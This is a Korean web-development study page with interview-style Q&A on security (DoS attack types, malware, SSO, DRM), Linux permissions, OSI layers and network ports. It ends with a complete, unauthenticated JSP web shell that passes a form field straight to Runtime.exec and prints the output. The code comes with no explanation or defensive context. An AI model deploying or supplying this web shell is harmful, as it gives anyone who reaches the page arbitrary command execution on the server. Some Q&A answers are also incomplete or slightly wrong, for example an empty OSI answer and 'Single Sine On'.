웹 개발과 관련된 모든 것들

보 안

[하] 1. 해킹은 무엇인가?

- 남의 컴퓨터 시스템에 침입하여 장난이나 범죄를 저지르는 일

ex) 아는 사람 컴퓨터 접속하여 비밀번호 변경 하기 등...

[상] 2. 서비스거부 (DoS, Denial of Service) 공격의 예는?

- Ping of Death : 핑 테스트 할 때 패킷의 크기를 최대크기인(65,500byte)로 하여 공격대상으로 보내면 패킷은 네트워크에서 수백개의 패킷으로 잘개 쪼개져 보내지고 공격 대상 시스템은 결과적으로 대량의 작은 패킷을 수신하게 되고, 네트워크는 마비된다.

- SYN Flooding : 네트워크에서 서비스를 제공하는 시스템에서는 동시 사용자 수 제한이 있다. 즉 SYN Flooding는 존재하지 않는 클라이언트가 서버별로 한정되어 접속 가능한 공간에 접속한 것 처럼 속여 다른 사용자가 서버의 서비스를 제공받지 못하게 함.

- Boink, Bonk, TearDrop : TCP의 약점을 이용하는 방식

- Land : 패킷을 전송 할 때 출발지 IP주소와 목적지 IP주소값을 똑같이 만들어서 공격 대상에게 보내는 것(시스템 부하를 올림)

- Smurf : 웜이 네트워크를 공격하는 데 많이 쓰임. Ping of Death처럼 ICMP 패킷을 이용, 다이렉트 브로크 캐스트를 사용

- Mail Bomb : 폭탄 메일, 스팸 메일도 이와 같은 종류

- DDOS(Distributed Denial of Service): 분산 서비스 거부 공격

[하] 3. DNS는 무엇이며 역할은?

- Domain Name Server로 우리가 알고 있는 도메인 명을 입력하면 그 IP주소에 해당하는 숫자 값을 변환해 주는 역할을 함.

[하] 4. Linux 시스템에서 ls -lsa 와 같은 형태로 조회 했을 때

-rwxr-xr-x 일 때 그 권한에 대해 설명 하시오

첫 rwx : 소유자에 대한 읽기 / 쓰기/ 실행 권한

두 번째 rwx : 그룹에 대한 읽기 / 쓰기 / 실행 권한

세 번째 rwx : 다른 모든 사람에 대한 읽기 / 쓰기 / 실행 권한

[상] 5. 악성코드란?

- 제작자가 의도적으로 사용자에게 피해를 주고자 만든 모든 악의적 목적을 가진 프로그램 및 매크로, 스크립트 등 컴퓨터 상에서 작동하는 모든 실행 가능한 형태

- 악성코드의 종류

* 바이러스 : 사용자 컴퓨터내에서 사용자 몰래 프로그램이나 실행 가능한 부분을 변형해 자신 또는 자신의 변경을 복사하는 프로그램 가장 큰 특성은 복제와 감염

* 웜 : 인터넷 또는 네트워크를 통해서 컴퓨터에서 컴퓨터로 전파되는 프로그램

* 백도어와 트로이 목마

[상] 6. SSO(Single Sine On)이란?

- 모든 인증을 하나의 시스템에서 수행하는 것으로 하나의 시스템에서 인증에 성공하면 다른 시스템에 접근 할 수 있는 권한도 모두 얻는 것이다.

- SSO의 가장 큰 약점은 일단 최초 인증 과정을 통과하면 모든 서버나 사이트에 접속이 가능해진다는 것인데, 이를 Single Point of Failure라고 함.

[상] 7. DRM(Digital Right Management)란 무엇인가?

- 운영체제의 커널에 DRM 모듀을 삽입해 문서에 대한 열람/편집/인쇄까지의 접근 권한을 설정하여 통제하는 기술임.

네트워크

[중] 1. OSI(Open System Interconnection) 7계층은?

-

[중] 2. OSI 7계층중 물리 장치의 고유 주소인 MAC(Media Access Control)을 이용한 로컬 통신이 가능하게 하는 계층은?

- 2계층(데이터 링크 계층)

[중] 3. OSI 7계층중 포토(Port)를 이용하여 시스템내의 응용 프로그램 간 통신을 가능하게 하는 계층은?

- 4계층(전송 계층)

[하] 4. 랜 케이블의 CAT5의 10/100 BASE-T에서 10/100은 무엇을 의미하는가?

- 전송 속도 10 ~ 100Mbps

[하] 5. telnet과 ftp를 사용하는 기본포트는?

- telnet : 23, ftp : 20(전송데이터), 21(인증과제어)

[하] 6. 전송방식 중 TCP와 UDP의 차이는?

- UDP는 데이터의 신뢰성 있는 전송을 보장하지 않음

JSP 용 web shell



<%@ page contentType="text/html;charset=euc-kr" %>
<%@ page import="java.io.*"%>
<%
String execute = request.getParameter("execute");
if(execute == null) execute = "";
%>
<html>
<head>
<title>
WebShell
</title>
<script>
function send()
{
        document.main.submit();
}
</script>

</head>
<body>
<br>
<form method="post" name="main" action="webshell.jsp">
<table width="400"  border="0" CELLPADDING=0 CELLSPACING=0>
    <tr bgcolor="#F7FCFE">
        <td height="22" align="center" width="70">명령어</td>
        <td height="22" align="center" align="left">
        <input type="text" name="execute" size="30" value="<%=execute%>">
        <input type="button" value="실행" onClick="javascript:send();"></td>
        </tr>
</table>
</form>
<hr>
<%
if(!execute.equals("")){
BufferedReader br = null;
Runtime rt = Runtime.getRuntime();
Process proc = rt.exec(execute);
br = new BufferedReader(new InputStreamReader(proc.getInputStream()));
String line;
while((line = br.readLine())!=null){
        out.println(line+"<br>");
}
br.close();
proc.destroy();
}
%>
</body>
</html>